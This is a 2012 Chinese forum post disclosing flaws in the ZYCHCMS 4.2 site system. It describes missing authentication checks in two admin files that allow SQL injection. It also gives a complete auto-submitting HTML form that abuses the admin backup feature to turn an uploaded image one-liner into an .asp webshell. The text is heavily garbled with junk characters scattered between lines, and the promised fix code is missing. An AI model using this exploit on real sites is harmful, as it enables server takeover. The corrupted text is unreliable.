& b0 [; B Q5 f2 ^
) n- ^9 ]6 l9 T: F/ x% [
' U6 \/ J( z; x$ h/ I4 g
# v, F/ e4 [1 P9 i( O影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)6 |5 K5 a6 ^. a0 q) y
①SQL注射漏洞
) J/ M' O$ a( M( } j; Y 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
% B2 g0 n: |3 J 漏洞原因:未过滤/ q( t, M/ \! r
漏洞代码:3 N% n" d* F9 ^. h" Q
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
2 Y0 ^5 x1 K4 v7 _' ~3 P 修复方法:在文件开头加入代码4 t* @/ e1 G5 a0 b; y( w2 Y
0 i, t5 \, s+ G0 Z
( i ]4 T. k$ J②后台拿WBSHELL
7 D6 U, {: R1 }! f- r 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。( u5 d7 ^6 d9 p5 E9 x" w, c$ y
这里在网上找了一个,改了下,将就着用。* D2 T# U: ?2 H( r
以下是代码本地提交代码
' a5 f7 S# m/ E" ?0 l
4 T) N6 j. G5 i' T5 z- {0 O1 r, l$ J: f9 K
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ C! \: [# l8 g
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>7 | K1 J8 D1 Q
<tr>
7 P6 |* s% G9 j$ o' S <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td># D) p) Z# Q) Z7 [/ T3 {! B
</tr>: P9 A* n* ?) i1 R: T g
<tr>9 P5 j( b" s, m" Q5 Q. H: j ]
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
" u" G, r: f3 h I </span>9 S- x3 Y; a% i, q/ L
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
2 q W7 W$ K) a <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >! D- F; \3 x. l1 v& V
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td># g% s4 L4 W6 \& h( Q. m' c
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
! r: N& [# C6 t* \0 |# [& b <div align=”left”>
$ G3 |, k! O5 F" I( R( E, J8 v <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />& k! T7 X4 M& M9 o; B% Z/ w
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>) l+ f" b) G. h4 J$ d8 }% \
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( R1 b. x5 L0 G O1 w </div></td>* c6 ^) p: M$ O/ @1 u) s0 I' |. ?
</tr>4 _; M; Y/ U6 a# i. B
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
8 r2 X# M; g: J2 a! _; Z <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
3 W% g1 F1 O& k7 d9 R4 T <td class=”td”><div align=”left”>' S" S; C7 H: D% N; r) _. G! P3 [
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
& B! b- S7 \( F7 ?! i' k [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
' A2 ?0 t7 \8 k5 r0 _: Q </tr>
& F+ ?7 t' o) H <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″># O. y- ?' B( E5 N' l8 u" a4 K
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
/ L5 N+ \1 g7 k2 W <td class=”td”><div align=”left”>- ]! ?( B% F6 A
<input type=”submit” value=”确定备份” class=”btn”, e9 a: l! W3 C5 j/ a
</div></td>" ~3 v; m$ u9 a9 ^- }8 H: l
</tr>2 I3 ^: |7 n6 ^2 B5 O( R" t
</table></td></tr></form>
/ K( f- R u3 @' a, v* F+ f </table>- I; G4 [0 c0 a# w5 q9 b4 V( o
</td>
+ W+ B# b. f" D+ ~% O0 i- k. T </tr>! k! n2 s; i; U- E1 x
</table>
- G+ {/ s% o* \$ F/ R+ i <script>& I& u9 J' U% |( S% S
document.all.add.submit();: E6 F+ g0 q) U2 g
</script>
- q3 T' p0 U% C( ~( S n
/ @4 x% v$ j c2 h4 [" O2 h! R- ?. `- S% ^: u5 T
6 u- `' K; F5 ?' {* ]( o2 J" B4 ~- y8 D- s+ _
' M4 Y+ l1 h' @: w" W5 c7 v
3 x* Y, C. w) [, ^" `# {/ Y# L& f) |
7 C7 C8 C Q- K9 }' [- X% _
' W. V4 q% c5 S2 ]4 b7 g3 }) x
( O, q i# Q* F2 `$ w/ k4 Y5 m6 ?+ b2 e9 p
|
发表于 2012-9-10 21:09:51
收藏
分享
支持
反对